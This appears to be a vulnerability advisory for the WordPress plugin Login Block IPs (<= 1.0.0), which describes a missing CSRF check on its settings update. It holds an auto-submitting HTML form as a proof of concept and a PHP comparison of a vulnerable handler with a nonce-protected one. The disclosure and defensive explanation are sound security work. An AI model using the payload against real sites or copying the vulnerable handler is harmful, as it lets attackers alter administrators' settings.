WordPress Plugin Vulnerabilities
Login Block IPs <= 1.0.0 - Arbitrary Setting Update via CSRF
Description
The plugin does not have a CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack.
Proof of Concept
Make a logged-in admin open a page containing the HTML code below:

<form id="test" action="https://example.com/wp-admin/admin.php?page=login-block-ips%2Fadmin%2Fpartials%2Flogin-block-ips-admin-display.php" method="POST">
  <input type="text" name="login-block-ips-form" value="1">
  <input type="text" name="security_code" value="fff">
  <input type="text" name="ip1" value="4.4.4.4">
  <input type="text" name="ipdesc1" value="test4">
  <input type="text" name="ip2" value="">
  <input type="text" name="ipdesc2" value="">
  <input type="text" name="ip3" value="">
  <input type="text" name="ipdesc3" value="">
  <input type="text" name="ip4" value="">
  <input type="text" name="ipdesc4" value="">
  <input type="text" name="ip5" value="">
  <input type="text" name="ipdesc5" value="">
  <input type="text" name="ip6" value="">
  <input type="text" name="ipdesc6" value="">
  <input type="text" name="ip7" value="">
  <input type="text" name="ipdesc7" value="">
  <input type="text" name="ip8" value="">
  <input type="text" name="ipdesc8" value="">
  <input type="text" name="ip9" value="">
  <input type="text" name="ipdesc9" value="">
  <input type="text" name="ip10" value="">
  <input type="text" name="ipdesc10" value="">
  <input type="text" name="ip11" value="">
  <input type="text" name="ipdesc11" value="">
  <input type="text" name="ip12" value="">
  <input type="text" name="ipdesc12" value="">
  <input type="text" name="ip13" value="">
  <input type="text" name="ipdesc13" value="">
  <input type="text" name="ip14" value="">
  <input type="text" name="ipdesc14" value="">
</form>
<script>
  document.getElementById("test").submit();
</script>
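The root cause is that the settings handler accepts any POST carrying the expected field names, so a form on an attacker-controlled page is indistinguishable from the plugin's own. The PHP below is an added illustration, not the Login Block IPs plugin's code: it shows a settings handler with that weakness next to a hardened one that binds the form to a WordPress nonce (`wp_nonce_field` / `check_admin_referer`) and a capability check. All function, option and nonce names (`lbi_example_*`) are hypothetical; the field names `ip1`..`ip14` and `ipdesc1`..`ipdesc14` mirror the proof of concept above.

```php
<?php
// Added example (not the plugin's own code). Names prefixed lbi_example_ are
// hypothetical; the form field names follow the advisory's proof of concept.

// Shared helper: read the ip{N}/ipdesc{N} pairs from the POST body.
function lbi_example_collect_ips( $validate ) {
    $ips = array();
    for ( $i = 1; $i <= 14; $i++ ) {
        $ip   = isset( $_POST[ "ip{$i}" ] ) ? sanitize_text_field( wp_unslash( $_POST[ "ip{$i}" ] ) ) : '';
        $desc = isset( $_POST[ "ipdesc{$i}" ] ) ? sanitize_text_field( wp_unslash( $_POST[ "ipdesc{$i}" ] ) ) : '';
        if ( '' === $ip ) {
            continue;
        }
        // Hardened path: keep only syntactically valid IP addresses.
        if ( $validate && false === filter_var( $ip, FILTER_VALIDATE_IP ) ) {
            continue;
        }
        $ips[] = array( 'ip' => $ip, 'desc' => $desc );
    }
    return $ips;
}

// --- Vulnerable pattern: a plain form field is the only "proof" the request is
// legitimate. A cross-site form can set it just as easily as the real one.
function lbi_example_save_settings_vulnerable() {
    if ( empty( $_POST['login-block-ips-form'] ) ) {
        return;
    }
    update_option( 'lbi_example_blocked_ips', lbi_example_collect_ips( false ) );
}

// --- Hardened pattern, part 1: the form embeds a nonce tied to this action.
function lbi_example_render_form() {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>">
        <input type="hidden" name="action" value="lbi_example_save">
        <?php wp_nonce_field( 'lbi_example_save_settings', 'lbi_example_nonce' ); ?>
        <input type="text" name="ip1">
        <input type="text" name="ipdesc1">
        <?php submit_button( 'Save' ); ?>
    </form>
    <?php
}

// --- Hardened pattern, part 2: verify capability and nonce before writing.
function lbi_example_save_settings_hardened() {
    // Only users allowed to manage options may change the block list.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions', '', array( 'response' => 403 ) );
    }
    // The nonce is generated per user and per action by WordPress; a form on
    // another origin cannot know it. check_admin_referer() stops the request
    // with a 403 page when the nonce is missing or invalid.
    check_admin_referer( 'lbi_example_save_settings', 'lbi_example_nonce' );

    update_option( 'lbi_example_blocked_ips', lbi_example_collect_ips( true ) );

    wp_safe_redirect( add_query_arg( 'updated', '1', wp_get_referer() ) );
    exit;
}
add_action( 'admin_post_lbi_example_save', 'lbi_example_save_settings_hardened' );
```

Routing the save through `admin-post.php` with a nonce is the standard WordPress pattern for this; the capability check is separate from the nonce and is needed because a nonce only proves the request came from a form WordPress rendered for that user, not that the user is allowed to perform the action.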
Classification
Type
CSRF
Miscellaneous
Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Verified
Yes
Timeline
Publicly Published
2022-09-05
Added
2022-09-05
Last Updated
2022-09-05